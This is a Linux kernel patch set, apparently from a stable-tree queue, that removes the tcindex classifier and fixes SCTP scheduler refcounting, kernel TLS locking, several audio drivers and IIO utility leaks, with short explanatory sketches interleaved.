+-	[TCA_TCINDEX_FALL_THROUGH]	= { .type = NLA_U32 },
+-	[TCA_TCINDEX_CLASSID]		= { .type = NLA_U32 },
+-};
+-
+-static int tcindex_filter_result_init(struct tcindex_filter_result *r,
+-				      struct tcindex_data *p,
+-				      struct net *net)
+-{
+-	memset(r, 0, sizeof(*r));
+-	r->p = p;
+-	return tcf_exts_init(&r->exts, net, TCA_TCINDEX_ACT,
+-			     TCA_TCINDEX_POLICE);
+-}
+-
+-static void tcindex_free_perfect_hash(struct tcindex_data *cp);
+-
+-static void tcindex_partial_destroy_work(struct work_struct *work)
+-{
+-	struct tcindex_data *p = container_of(to_rcu_work(work),
+-					      struct tcindex_data,
+-					      rwork);
+-
+-	rtnl_lock();
+-	if (p->perfect)
+-		tcindex_free_perfect_hash(p);
+-	kfree(p);
+-	rtnl_unlock();
+-}
+-
+-static void tcindex_free_perfect_hash(struct tcindex_data *cp)
+-{
+-	int i;
+-
+-	for (i = 0; i < cp->hash; i++)
+-		tcf_exts_destroy(&cp->perfect[i].exts);
+-	kfree(cp->perfect);
+-}
+-
+-static int tcindex_alloc_perfect_hash(struct net *net, struct tcindex_data *cp)
+-{
+-	int i, err = 0;
+-
+-	cp->perfect = kcalloc(cp->hash, sizeof(struct tcindex_filter_result),
+-			      GFP_KERNEL | __GFP_NOWARN);
+-	if (!cp->perfect)
+-		return -ENOMEM;
+-
+-	for (i = 0; i < cp->hash; i++) {
+-		err = tcf_exts_init(&cp->perfect[i].exts, net,
+-				    TCA_TCINDEX_ACT, TCA_TCINDEX_POLICE);
+-		if (err < 0)
+-			goto errout;
+-		cp->perfect[i].p = cp;
+-	}
+-
+-	return 0;
+-
+-errout:
+-	tcindex_free_perfect_hash(cp);
+-	return err;
+-}
+-
+-static int
+-tcindex_set_parms(struct net *net, struct tcf_proto *tp, unsigned long base,
+-		  u32 handle, struct tcindex_data *p,
+-		  struct tcindex_filter_result *r, struct nlattr **tb,
+-		  struct nlattr *est, u32 flags, struct netlink_ext_ack *extack)
+-{
+-	struct tcindex_filter_result new_filter_result;
+-	struct tcindex_data *cp = NULL, *oldp;
+-	struct tcindex_filter *f = NULL; /* make gcc behave */
+-	struct tcf_result cr = {};
+-	int err, balloc = 0;
+-	struct tcf_exts e;
+-	bool update_h = false;
+-
+-	err = tcf_exts_init(&e, net, TCA_TCINDEX_ACT, TCA_TCINDEX_POLICE);
+-	if (err < 0)
+-		return err;
+-	err = tcf_exts_validate(net, tp, tb, est, &e, flags, extack);
+-	if (err < 0)
+-		goto errout;
+-
+-	err = -ENOMEM;
+-	/* tcindex_data attributes must look atomic to classifier/lookup so
+-	 * allocate new tcindex data and RCU assign it onto root. Keeping
+-	 * perfect hash and hash pointers from old data.
+-	 */
+-	cp = kzalloc(sizeof(*cp), GFP_KERNEL);
+-	if (!cp)
+-		goto errout;
+-
+-	cp->mask = p->mask;
+-	cp->shift = p->shift;
+-	cp->hash = p->hash;
+-	cp->alloc_hash = p->alloc_hash;
+-	cp->fall_through = p->fall_through;
+-	cp->tp = tp;
+-	refcount_set(&cp->refcnt, 1); /* Paired with tcindex_destroy_work() */
+-
+-	if (tb[TCA_TCINDEX_HASH])
+-		cp->hash = nla_get_u32(tb[TCA_TCINDEX_HASH]);
+-
+-	if (tb[TCA_TCINDEX_MASK])
+-		cp->mask = nla_get_u16(tb[TCA_TCINDEX_MASK]);
+-
+-	if (tb[TCA_TCINDEX_SHIFT]) {
+-		cp->shift = nla_get_u32(tb[TCA_TCINDEX_SHIFT]);
+-		if (cp->shift > 16) {
+-			err = -EINVAL;
+-			goto errout;
+-		}
+-	}
+-	if (!cp->hash) {
+-		/* Hash not specified, use perfect hash if the upper limit
+-		 * of the hashing index is below the threshold.
+-		 */
+-		if ((cp->mask >> cp->shift) < PERFECT_HASH_THRESHOLD)
+-			cp->hash = (cp->mask >> cp->shift) + 1;
+-		else
+-			cp->hash = DEFAULT_HASH_SIZE;
+-	}
+-
+-	if (p->perfect) {
+-		int i;
+-
+-		if (tcindex_alloc_perfect_hash(net, cp) < 0)
+-			goto errout;
+-		cp->alloc_hash = cp->hash;
+-		for (i = 0; i < min(cp->hash, p->hash); i++)
+-			cp->perfect[i].res = p->perfect[i].res;
+-		balloc = 1;
+-	}
+-	cp->h = p->h;
+-
+-	err = tcindex_filter_result_init(&new_filter_result, cp, net);
+-	if (err < 0)
+-		goto errout_alloc;
+-	if (r)
+-		cr = r->res;
+-
+-	err = -EBUSY;
+-
+-	/* Hash already allocated, make sure that we still meet the
+-	 * requirements for the allocated hash.
+-	 */
+-	if (cp->perfect) {
+-		if (!valid_perfect_hash(cp) ||
+-		    cp->hash > cp->alloc_hash)
+-			goto errout_alloc;
+-	} else if (cp->h && cp->hash != cp->alloc_hash) {
+-		goto errout_alloc;
+-	}
+-
+-	err = -EINVAL;
+-	if (tb[TCA_TCINDEX_FALL_THROUGH])
+-		cp->fall_through = nla_get_u32(tb[TCA_TCINDEX_FALL_THROUGH]);
+-
+-	if (!cp->perfect && !cp->h)
+-		cp->alloc_hash = cp->hash;
+-
+-	/* Note: this could be as restrictive as if (handle & ~(mask >> shift))
+-	 * but then, we'd fail handles that may become valid after some future
+-	 * mask change. While this is extremely unlikely to ever matter,
+-	 * the check below is safer (and also more backwards-compatible).
+-	 */
+-	if (cp->perfect || valid_perfect_hash(cp))
+-		if (handle >= cp->alloc_hash)
+-			goto errout_alloc;
+-
+-
+-	err = -ENOMEM;
+-	if (!cp->perfect && !cp->h) {
+-		if (valid_perfect_hash(cp)) {
+-			if (tcindex_alloc_perfect_hash(net, cp) < 0)
+-				goto errout_alloc;
+-			balloc = 1;
+-		} else {
+-			struct tcindex_filter __rcu **hash;
+-
+-			hash = kcalloc(cp->hash,
+-				       sizeof(struct tcindex_filter *),
+-				       GFP_KERNEL);
+-
+-			if (!hash)
+-				goto errout_alloc;
+-
+-			cp->h = hash;
+-			balloc = 2;
+-		}
+-	}
+-
+-	if (cp->perfect) {
+-		r = cp->perfect + handle;
+-	} else {
+-		/* imperfect area is updated in-place using rcu */
+-		update_h = !!tcindex_lookup(cp, handle);
+-		r = &new_filter_result;
+-	}
+-
+-	if (r == &new_filter_result) {
+-		f = kzalloc(sizeof(*f), GFP_KERNEL);
+-		if (!f)
+-			goto errout_alloc;
+-		f->key = handle;
+-		f->next = NULL;
+-		err = tcindex_filter_result_init(&f->result, cp, net);
+-		if (err < 0) {
+-			kfree(f);
+-			goto errout_alloc;
+-		}
+-	}
+-
+-	if (tb[TCA_TCINDEX_CLASSID]) {
+-		cr.classid = nla_get_u32(tb[TCA_TCINDEX_CLASSID]);
+-		tcf_bind_filter(tp, &cr, base);
+-	}
+-
+-	oldp = p;
+-	r->res = cr;
+-	tcf_exts_change(&r->exts, &e);
+-
+-	rcu_assign_pointer(tp->root, cp);
+-
+-	if (update_h) {
+-		struct tcindex_filter __rcu **fp;
+-		struct tcindex_filter *cf;
+-
+-		f->result.res = r->res;
+-		tcf_exts_change(&f->result.exts, &r->exts);
+-
+-		/* imperfect area bucket */
+-		fp = cp->h + (handle % cp->hash);
+-
+-		/* lookup the filter, guaranteed to exist */
+-		for (cf = rcu_dereference_bh_rtnl(*fp); cf;
+-		     fp = &cf->next, cf = rcu_dereference_bh_rtnl(*fp))
+-			if (cf->key == (u16)handle)
+-				break;
+-
+-		f->next = cf->next;
+-
+-		cf = rcu_replace_pointer(*fp, f, 1);
+-		tcf_exts_get_net(&cf->result.exts);
+-		tcf_queue_work(&cf->rwork, tcindex_destroy_fexts_work);
+-	} else if (r == &new_filter_result) {
+-		struct tcindex_filter *nfp;
+-		struct tcindex_filter __rcu **fp;
+-
+-		f->result.res = r->res;
+-		tcf_exts_change(&f->result.exts, &r->exts);
+-
+-		fp = cp->h + (handle % cp->hash);
+-		for (nfp = rtnl_dereference(*fp);
+-		     nfp;
+-		     fp = &nfp->next, nfp = rtnl_dereference(*fp))
+-				; /* nothing */
+-
+-		rcu_assign_pointer(*fp, f);
+-	} else {
+-		tcf_exts_destroy(&new_filter_result.exts);
+-	}
+-
+-	if (oldp)
+-		tcf_queue_work(&oldp->rwork, tcindex_partial_destroy_work);
+-	return 0;
+-
+-errout_alloc:
+-	if (balloc == 1)
+-		tcindex_free_perfect_hash(cp);
+-	else if (balloc == 2)
+-		kfree(cp->h);
+-	tcf_exts_destroy(&new_filter_result.exts);
+-errout:
+-	kfree(cp);
+-	tcf_exts_destroy(&e);
+-	return err;
+-}
+-
+-static int
+-tcindex_change(struct net *net, struct sk_buff *in_skb,
+-	       struct tcf_proto *tp, unsigned long base, u32 handle,
+-	       struct nlattr **tca, void **arg, u32 flags,
+-	       struct netlink_ext_ack *extack)
+-{
+-	struct nlattr *opt = tca[TCA_OPTIONS];
+-	struct nlattr *tb[TCA_TCINDEX_MAX + 1];
+-	struct tcindex_data *p = rtnl_dereference(tp->root);
+-	struct tcindex_filter_result *r = *arg;
+-	int err;
+-
+-	pr_debug("tcindex_change(tp %p,handle 0x%08x,tca %p,arg %p),opt %p,"
+-	    "p %p,r %p,*arg %p\n",
+-	    tp, handle, tca, arg, opt, p, r, *arg);
+-
+-	if (!opt)
+-		return 0;
+-
+-	err = nla_parse_nested_deprecated(tb, TCA_TCINDEX_MAX, opt,
+-					  tcindex_policy, NULL);
+-	if (err < 0)
+-		return err;
+-
+-	return tcindex_set_parms(net, tp, base, handle, p, r, tb,
+-				 tca[TCA_RATE], flags, extack);
+-}
+-
+-static void tcindex_walk(struct tcf_proto *tp, struct tcf_walker *walker,
+-			 bool rtnl_held)
+-{
+-	struct tcindex_data *p = rtnl_dereference(tp->root);
+-	struct tcindex_filter *f, *next;
+-	int i;
+-
+-	pr_debug("tcindex_walk(tp %p,walker %p),p %p\n", tp, walker, p);
+-	if (p->perfect) {
+-		for (i = 0; i < p->hash; i++) {
+-			if (!p->perfect[i].res.class)
+-				continue;
+-			if (!tc_cls_stats_dump(tp, walker, p->perfect + i))
+-				return;
+-		}
+-	}
+-	if (!p->h)
+-		return;
+-	for (i = 0; i < p->hash; i++) {
+-		for (f = rtnl_dereference(p->h[i]); f; f = next) {
+-			next = rtnl_dereference(f->next);
+-			if (!tc_cls_stats_dump(tp, walker, &f->result))
+-				return;
+-		}
+-	}
+-}
+-
+-static void tcindex_destroy(struct tcf_proto *tp, bool rtnl_held,
+-			    struct netlink_ext_ack *extack)
+-{
+-	struct tcindex_data *p = rtnl_dereference(tp->root);
+-	int i;
+-
+-	pr_debug("tcindex_destroy(tp %p),p %p\n", tp, p);
+-
+-	if (p->perfect) {
+-		for (i = 0; i < p->hash; i++) {
+-			struct tcindex_filter_result *r = p->perfect + i;
+-
+-			/* tcf_queue_work() does not guarantee the ordering we
+-			 * want, so we have to take this refcnt temporarily to
+-			 * ensure 'p' is freed after all tcindex_filter_result
+-			 * here. Imperfect hash does not need this, because it
+-			 * uses linked lists rather than an array.
+-			 */
+-			tcindex_data_get(p);
+-
+-			tcf_unbind_filter(tp, &r->res);
+-			if (tcf_exts_get_net(&r->exts))
+-				tcf_queue_work(&r->rwork,
+-					       tcindex_destroy_rexts_work);
+-			else
+-				__tcindex_destroy_rexts(r);
+-		}
+-	}
+-
+-	for (i = 0; p->h && i < p->hash; i++) {
+-		struct tcindex_filter *f, *next;
+-		bool last;
+-
+-		for (f = rtnl_dereference(p->h[i]); f; f = next) {
+-			next = rtnl_dereference(f->next);
+-			tcindex_delete(tp, &f->result, &last, rtnl_held, NULL);
+-		}
+-	}
+-
+-	tcf_queue_work(&p->rwork, tcindex_destroy_work);
+-}
+-
+-
+-static int tcindex_dump(struct net *net, struct tcf_proto *tp, void *fh,
+-			struct sk_buff *skb, struct tcmsg *t, bool rtnl_held)
+-{
+-	struct tcindex_data *p = rtnl_dereference(tp->root);
+-	struct tcindex_filter_result *r = fh;
+-	struct nlattr *nest;
+-
+-	pr_debug("tcindex_dump(tp %p,fh %p,skb %p,t %p),p %p,r %p\n",
+-		 tp, fh, skb, t, p, r);
+-	pr_debug("p->perfect %p p->h %p\n", p->perfect, p->h);
+-
+-	nest = nla_nest_start_noflag(skb, TCA_OPTIONS);
+-	if (nest == NULL)
+-		goto nla_put_failure;
+-
+-	if (!fh) {
+-		t->tcm_handle = ~0; /* whatever ... */
+-		if (nla_put_u32(skb, TCA_TCINDEX_HASH, p->hash) ||
+-		    nla_put_u16(skb, TCA_TCINDEX_MASK, p->mask) ||
+-		    nla_put_u32(skb, TCA_TCINDEX_SHIFT, p->shift) ||
+-		    nla_put_u32(skb, TCA_TCINDEX_FALL_THROUGH, p->fall_through))
+-			goto nla_put_failure;
+-		nla_nest_end(skb, nest);
+-	} else {
+-		if (p->perfect) {
+-			t->tcm_handle = r - p->perfect;
+-		} else {
+-			struct tcindex_filter *f;
+-			struct tcindex_filter __rcu **fp;
+-			int i;
+-
+-			t->tcm_handle = 0;
+-			for (i = 0; !t->tcm_handle && i < p->hash; i++) {
+-				fp = &p->h[i];
+-				for (f = rtnl_dereference(*fp);
+-				     !t->tcm_handle && f;
+-				     fp = &f->next, f = rtnl_dereference(*fp)) {
+-					if (&f->result == r)
+-						t->tcm_handle = f->key;
+-				}
+-			}
+-		}
+-		pr_debug("handle = %d\n", t->tcm_handle);
+-		if (r->res.class &&
+-		    nla_put_u32(skb, TCA_TCINDEX_CLASSID, r->res.classid))
+-			goto nla_put_failure;
+-
+-		if (tcf_exts_dump(skb, &r->exts) < 0)
+-			goto nla_put_failure;
+-		nla_nest_end(skb, nest);
+-
+-		if (tcf_exts_dump_stats(skb, &r->exts) < 0)
+-			goto nla_put_failure;
+-	}
+-
+-	return skb->len;
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, nest);
+-	return -1;
+-}
+-
+-static void tcindex_bind_class(void *fh, u32 classid, unsigned long cl,
+-			       void *q, unsigned long base)
+-{
+-	struct tcindex_filter_result *r = fh;
+-
+-	tc_cls_bind_class(classid, cl, q, &r->res, base);
+-}
+-
+-static struct tcf_proto_ops cls_tcindex_ops __read_mostly = {
+-	.kind		=	"tcindex",
+-	.classify	=	tcindex_classify,
+-	.init		=	tcindex_init,
+-	.destroy	=	tcindex_destroy,
+-	.get		=	tcindex_get,
+-	.change		=	tcindex_change,
+-	.delete		=	tcindex_delete,
+-	.walk		=	tcindex_walk,
+-	.dump		=	tcindex_dump,
+-	.bind_class	=	tcindex_bind_class,
+-	.owner		=	THIS_MODULE,
+-};
+-
+-static int __init init_tcindex(void)
+-{
+-	return register_tcf_proto_ops(&cls_tcindex_ops);
+-}
+-
+-static void __exit exit_tcindex(void)
+-{
+-	unregister_tcf_proto_ops(&cls_tcindex_ops);
+-}
+-
+-module_init(init_tcindex)
+-module_exit(exit_tcindex)
+-MODULE_LICENSE("GPL");
+diff --git a/net/sctp/stream_sched_prio.c b/net/sctp/stream_sched_prio.c
+index 42d4800f263dd..4d4d9da331f4c 100644
+--- a/net/sctp/stream_sched_prio.c
++++ b/net/sctp/stream_sched_prio.c
+@@ -25,6 +25,18 @@
+ 
+ static void sctp_sched_prio_unsched_all(struct sctp_stream *stream);
+ 
++static struct sctp_stream_priorities *sctp_sched_prio_head_get(struct sctp_stream_priorities *p)
++{
++	p->users++;
++	return p;
++}
++
++static void sctp_sched_prio_head_put(struct sctp_stream_priorities *p)
++{
++	if (p && --p->users == 0)
++		kfree(p);
++}
++
+ static struct sctp_stream_priorities *sctp_sched_prio_new_head(
+ 			struct sctp_stream *stream, int prio, gfp_t gfp)
+ {
+@@ -38,6 +50,7 @@ static struct sctp_stream_priorities *sctp_sched_prio_new_head(
+ 	INIT_LIST_HEAD(&p->active);
+ 	p->next = NULL;
+ 	p->prio = prio;
++	p->users = 1;
+ 
+ 	return p;
+ }
+@@ -53,7 +66,7 @@ static struct sctp_stream_priorities *sctp_sched_prio_get_head(
+ 	 */
+ 	list_for_each_entry(p, &stream->prio_list, prio_sched) {
+ 		if (p->prio == prio)
+-			return p;
++			return sctp_sched_prio_head_get(p);
+ 		if (p->prio > prio)
+ 			break;
+ 	}
+@@ -70,7 +83,7 @@ static struct sctp_stream_priorities *sctp_sched_prio_get_head(
+ 			 */
+ 			break;
+ 		if (p->prio == prio)
+-			return p;
++			return sctp_sched_prio_head_get(p);
+ 	}
+ 
+ 	/* If not even there, allocate a new one. */
+@@ -154,32 +167,21 @@ static int sctp_sched_prio_set(struct sctp_stream *stream, __u16 sid,
+ 	struct sctp_stream_out_ext *soute = sout->ext;
+ 	struct sctp_stream_priorities *prio_head, *old;
+ 	bool reschedule = false;
+-	int i;
++
++	old = soute->prio_head;
++	if (old && old->prio == prio)
++		return 0;
+ 
+ 	prio_head = sctp_sched_prio_get_head(stream, prio, gfp);
+ 	if (!prio_head)
+ 		return -ENOMEM;
+ 
+ 	reschedule = sctp_sched_prio_unsched(soute);
+-	old = soute->prio_head;
+ 	soute->prio_head = prio_head;
+ 	if (reschedule)
+ 		sctp_sched_prio_sched(stream, soute);
+ 
+-	if (!old)
+-		/* Happens when we set the priority for the first time */
+-		return 0;
+-
+-	for (i = 0; i < stream->outcnt; i++) {
+-		soute = SCTP_SO(stream, i)->ext;
+-		if (soute && soute->prio_head == old)
+-			/* It's still in use, nothing else to do here. */
+-			return 0;
+-	}
+-
+-	/* No hits, we are good to free it. */
+-	kfree(old);
+-
++	sctp_sched_prio_head_put(old);
+ 	return 0;
+ }
+ 
+@@ -206,20 +208,8 @@ static int sctp_sched_prio_init_sid(struct sctp_stream *stream, __u16 sid,
+ 
+ static void sctp_sched_prio_free_sid(struct sctp_stream *stream, __u16 sid)
+ {
+-	struct sctp_stream_priorities *prio = SCTP_SO(stream, sid)->ext->prio_head;
+-	int i;
+-
+-	if (!prio)
+-		return;
+-
++	sctp_sched_prio_head_put(SCTP_SO(stream, sid)->ext->prio_head);
+ 	SCTP_SO(stream, sid)->ext->prio_head = NULL;
+-	for (i = 0; i < stream->outcnt; i++) {
+-		if (SCTP_SO(stream, i)->ext &&
+-		    SCTP_SO(stream, i)->ext->prio_head == prio)
+-			return;
+-	}
+-
+-	kfree(prio);
+ }
+ 
+ static void sctp_sched_prio_enqueue(struct sctp_outq *q,
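
The stream_sched_prio change above swaps two O(outcnt) scans for a plain reference count on the shared priority head. A minimal userspace sketch of that get/put lifetime pattern, with illustrative names rather than the kernel structures:

#include <stdlib.h>

/* Stand-in for sctp_stream_priorities: one shared head per priority
 * value, kept alive by a plain use count. */
struct prio_head {
	int prio;
	unsigned int users;
};

static struct prio_head *head_new(int prio)
{
	struct prio_head *p = malloc(sizeof(*p));

	if (!p)
		return NULL;
	p->prio = prio;
	p->users = 1;		/* creator holds the first reference */
	return p;
}

static struct prio_head *head_get(struct prio_head *p)
{
	p->users++;		/* another stream now shares this head */
	return p;
}

static void head_put(struct prio_head *p)
{
	if (p && --p->users == 0)
		free(p);	/* last user frees; no O(n) stream scan */
}

int main(void)
{
	struct prio_head *a = head_new(10);
	struct prio_head *b;

	if (!a)
		return 1;
	b = head_get(a);	/* a second stream reuses the head */

	head_put(a);		/* still alive: b holds a reference */
	head_put(b);		/* count hits zero, freed here */
	return 0;
}

The creator holds the first reference and the last put frees, so neither set() nor free_sid() needs to walk the other streams any more.
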
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index a83d2b4275fa6..38dcd9b401027 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -941,7 +941,9 @@ int tls_sw_sendmsg(struct sock *sk, struct msghdr *msg, size_t size)
+ 			       MSG_CMSG_COMPAT))
+ 		return -EOPNOTSUPP;
+ 
+-	mutex_lock(&tls_ctx->tx_lock);
++	ret = mutex_lock_interruptible(&tls_ctx->tx_lock);
++	if (ret)
++		return ret;
+ 	lock_sock(sk);
+ 
+ 	if (unlikely(msg->msg_controllen)) {
+@@ -1275,7 +1277,9 @@ int tls_sw_sendpage(struct sock *sk, struct page *page,
+ 		      MSG_SENDPAGE_NOTLAST | MSG_SENDPAGE_NOPOLICY))
+ 		return -EOPNOTSUPP;
+ 
+-	mutex_lock(&tls_ctx->tx_lock);
++	ret = mutex_lock_interruptible(&tls_ctx->tx_lock);
++	if (ret)
++		return ret;
+ 	lock_sock(sk);
+ 	ret = tls_sw_do_sendpage(sk, page, offset, size, flags);
+ 	release_sock(sk);
+@@ -2416,11 +2420,19 @@ static void tx_work_handler(struct work_struct *work)
+ 
+ 	if (!test_and_clear_bit(BIT_TX_SCHEDULED, &ctx->tx_bitmask))
+ 		return;
+-	mutex_lock(&tls_ctx->tx_lock);
+-	lock_sock(sk);
+-	tls_tx_records(sk, -1);
+-	release_sock(sk);
+-	mutex_unlock(&tls_ctx->tx_lock);
++
++	if (mutex_trylock(&tls_ctx->tx_lock)) {
++		lock_sock(sk);
++		tls_tx_records(sk, -1);
++		release_sock(sk);
++		mutex_unlock(&tls_ctx->tx_lock);
++	} else if (!test_and_set_bit(BIT_TX_SCHEDULED, &ctx->tx_bitmask)) {
++		/* Someone is holding the tx_lock, they will likely run Tx
++		 * and cancel the work on their way out of the lock section.
++		 * Schedule a long delay just in case.
++		 */
++		schedule_delayed_work(&ctx->tx_work.work, msecs_to_jiffies(10));
++	}
+ }
+ 
+ static bool tls_is_tx_ready(struct tls_sw_context_tx *ctx)
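
Both tls_sw hunks revolve around tx_lock: the sendmsg/sendpage paths now take it interruptibly, and the work handler only trylocks it, so a kworker never blocks on a lock whose holder will flush the records anyway. A rough userspace sketch of the trylock-or-rearm shape, using illustrative helpers rather than the kernel API:

#include <pthread.h>

static pthread_mutex_t tx_lock = PTHREAD_MUTEX_INITIALIZER;

static void flush_pending_records(void)
{
	/* transmit whatever records are queued */
}

static void rearm_work_later(void)
{
	/* re-queue this handler with a delay, as a safety net */
}

static void tx_work_handler(void)
{
	if (pthread_mutex_trylock(&tx_lock) == 0) {
		flush_pending_records();
		pthread_mutex_unlock(&tx_lock);
	} else {
		/* The lock holder will flush on its way out of the
		 * critical section; only schedule a delayed retry. */
		rearm_work_later();
	}
}
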
+diff --git a/sound/soc/apple/mca.c b/sound/soc/apple/mca.c
+index 24381c42eb54c..64750db9b9639 100644
+--- a/sound/soc/apple/mca.c
++++ b/sound/soc/apple/mca.c
+@@ -101,7 +101,6 @@
+ #define SERDES_CONF_UNK3	BIT(14)
+ #define SERDES_CONF_NO_DATA_FEEDBACK	BIT(15)
+ #define SERDES_CONF_SYNC_SEL	GENMASK(18, 16)
+-#define SERDES_CONF_SOME_RST	BIT(19)
+ #define REG_TX_SERDES_BITSTART	0x08
+ #define REG_RX_SERDES_BITSTART	0x0c
+ #define REG_TX_SERDES_SLOTMASK	0x0c
+@@ -203,15 +202,24 @@ static void mca_fe_early_trigger(struct snd_pcm_substream *substream, int cmd,
+ 	case SNDRV_PCM_TRIGGER_START:
+ 	case SNDRV_PCM_TRIGGER_RESUME:
+ 	case SNDRV_PCM_TRIGGER_PAUSE_RELEASE:
++		mca_modify(cl, serdes_conf, SERDES_CONF_SYNC_SEL,
++			   FIELD_PREP(SERDES_CONF_SYNC_SEL, 0));
++		mca_modify(cl, serdes_conf, SERDES_CONF_SYNC_SEL,
++			   FIELD_PREP(SERDES_CONF_SYNC_SEL, 7));
+ 		mca_modify(cl, serdes_unit + REG_SERDES_STATUS,
+ 			   SERDES_STATUS_EN | SERDES_STATUS_RST,
+ 			   SERDES_STATUS_RST);
+-		mca_modify(cl, serdes_conf, SERDES_CONF_SOME_RST,
+-			   SERDES_CONF_SOME_RST);
+-		readl_relaxed(cl->base + serdes_conf);
+-		mca_modify(cl, serdes_conf, SERDES_STATUS_RST, 0);
+-		WARN_ON(readl_relaxed(cl->base + REG_SERDES_STATUS) &
++		/*
++		 * Experiments suggest that it takes at most ~1 us
++		 * for the bit to clear, so wait 2 us for good measure.
++		 */
++		udelay(2);
++		WARN_ON(readl_relaxed(cl->base + serdes_unit + REG_SERDES_STATUS) &
+ 			SERDES_STATUS_RST);
++		mca_modify(cl, serdes_conf, SERDES_CONF_SYNC_SEL,
++			   FIELD_PREP(SERDES_CONF_SYNC_SEL, 0));
++		mca_modify(cl, serdes_conf, SERDES_CONF_SYNC_SEL,
++			   FIELD_PREP(SERDES_CONF_SYNC_SEL, cl->no + 1));
+ 		break;
+ 	default:
+ 		break;
+@@ -942,10 +950,17 @@ static int mca_pcm_new(struct snd_soc_component *component,
+ 		chan = mca_request_dma_channel(cl, i);
+ 
+ 		if (IS_ERR_OR_NULL(chan)) {
++			mca_pcm_free(component, rtd->pcm);
++
++			if (chan && PTR_ERR(chan) == -EPROBE_DEFER)
++				return PTR_ERR(chan);
++
+ 			dev_err(component->dev, "unable to obtain DMA channel (stream %d cluster %d): %pe\n",
+ 				i, cl->no, chan);
+-			mca_pcm_free(component, rtd->pcm);
+-			return -EINVAL;
++
++			if (!chan)
++				return -EINVAL;
++			return PTR_ERR(chan);
+ 		}
+ 
+ 		cl->dma_chans[i] = chan;
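
The early-trigger hunk drops the undocumented SERDES_CONF_SOME_RST write in favour of pulsing the reset bit in the status register, waiting a bounded settling time, and verifying the bit cleared. A hedged sketch of that pulse-and-check shape, with an invented register layout:

#include <stdint.h>
#include <assert.h>

#define STATUS_RST (1u << 1)	/* invented bit position, for illustration */

static void delay_us(unsigned int us)
{
	(void)us;	/* platform-specific bounded busy-wait */
}

static void serdes_reset(volatile uint32_t *status)
{
	*status |= STATUS_RST;	/* request the self-clearing reset */

	/* Per the comment in the hunk, the bit clears within ~1 us;
	 * wait 2 us for margin, then verify it really did clear. */
	delay_us(2);
	assert(!(*status & STATUS_RST));
}
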
+diff --git a/sound/soc/codecs/Kconfig b/sound/soc/codecs/Kconfig
+index 0f9d71490075f..ac2a2bfdaf37a 100644
+--- a/sound/soc/codecs/Kconfig
++++ b/sound/soc/codecs/Kconfig
+@@ -2045,6 +2045,7 @@ config SND_SOC_WSA883X
+ config SND_SOC_ZL38060
+ 	tristate "Microsemi ZL38060 Connected Home Audio Processor"
+ 	depends on SPI_MASTER
++	depends on GPIOLIB
+ 	select REGMAP
+ 	help
+ 	  Support for ZL38060 Connected Home Audio Processor from Microsemi,
+diff --git a/sound/soc/codecs/adau7118.c b/sound/soc/codecs/adau7118.c
+index bbb0972498876..a663d37e57760 100644
+--- a/sound/soc/codecs/adau7118.c
++++ b/sound/soc/codecs/adau7118.c
+@@ -444,22 +444,6 @@ static const struct snd_soc_component_driver adau7118_component_driver = {
+ 	.endianness		= 1,
+ };
+ 
+-static void adau7118_regulator_disable(void *data)
+-{
+-	struct adau7118_data *st = data;
+-	int ret;
+-	/*
+-	 * If we fail to disable DVDD, don't bother in trying IOVDD. We
+-	 * actually don't want to be left in the situation where DVDD
+-	 * is enabled and IOVDD is disabled.
+-	 */
+-	ret = regulator_disable(st->dvdd);
+-	if (ret)
+-		return;
+-
+-	regulator_disable(st->iovdd);
+-}
+-
+ static int adau7118_regulator_setup(struct adau7118_data *st)
+ {
+ 	st->iovdd = devm_regulator_get(st->dev, "iovdd");
+@@ -481,8 +465,7 @@ static int adau7118_regulator_setup(struct adau7118_data *st)
+ 		regcache_cache_only(st->map, true);
+ 	}
+ 
+-	return devm_add_action_or_reset(st->dev, adau7118_regulator_disable,
+-					st);
++	return 0;
+ }
+ 
+ static int adau7118_parset_dt(const struct adau7118_data *st)
+diff --git a/sound/soc/mediatek/mt8195/mt8195-dai-etdm.c b/sound/soc/mediatek/mt8195/mt8195-dai-etdm.c
+index c2e268054773d..f2c9a1fdbe0d0 100644
+--- a/sound/soc/mediatek/mt8195/mt8195-dai-etdm.c
++++ b/sound/soc/mediatek/mt8195/mt8195-dai-etdm.c
+@@ -2567,6 +2567,9 @@ static void mt8195_dai_etdm_parse_of(struct mtk_base_afe *afe)
+ 
+ 	/* etdm in only */
+ 	for (i = 0; i < 2; i++) {
++		dai_id = ETDM_TO_DAI_ID(i);
++		etdm_data = afe_priv->dai_priv[dai_id];
++
+ 		ret = snprintf(prop, sizeof(prop),
+ 			       "mediatek,%s-chn-disabled",
+ 			       of_afe_etdms[i].name);
+diff --git a/tools/iio/iio_utils.c b/tools/iio/iio_utils.c
+index 8d35893b2fa85..6a00a6eecaef0 100644
+--- a/tools/iio/iio_utils.c
++++ b/tools/iio/iio_utils.c
+@@ -264,6 +264,7 @@ int iioutils_get_param_float(float *output, const char *param_name,
+ 			if (fscanf(sysfsfp, "%f", output) != 1)
+ 				ret = errno ? -errno : -ENODATA;
+ 
++			fclose(sysfsfp);
+ 			break;
+ 		}
+ error_free_filename:
+@@ -345,9 +346,9 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 			}
+ 
+ 			sysfsfp = fopen(filename, "r");
++			free(filename);
+ 			if (!sysfsfp) {
+ 				ret = -errno;
+-				free(filename);
+ 				goto error_close_dir;
+ 			}
+ 
+@@ -357,7 +358,6 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 				if (fclose(sysfsfp))
+ 					perror("build_channel_array(): Failed to close file");
+ 
+-				free(filename);
+ 				goto error_close_dir;
+ 			}
+ 			if (ret == 1)
+@@ -365,11 +365,9 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 
+ 			if (fclose(sysfsfp)) {
+ 				ret = -errno;
+-				free(filename);
+ 				goto error_close_dir;
+ 			}
+ 
+-			free(filename);
+ 		}
+ 
+ 	*ci_array = malloc(sizeof(**ci_array) * (*counter));
+@@ -395,9 +393,9 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 			}
+ 
+ 			sysfsfp = fopen(filename, "r");
++			free(filename);
+ 			if (!sysfsfp) {
+ 				ret = -errno;
+-				free(filename);
+ 				count--;
+ 				goto error_cleanup_array;
+ 			}
+@@ -405,20 +403,17 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 			errno = 0;
+ 			if (fscanf(sysfsfp, "%i", &current_enabled) != 1) {
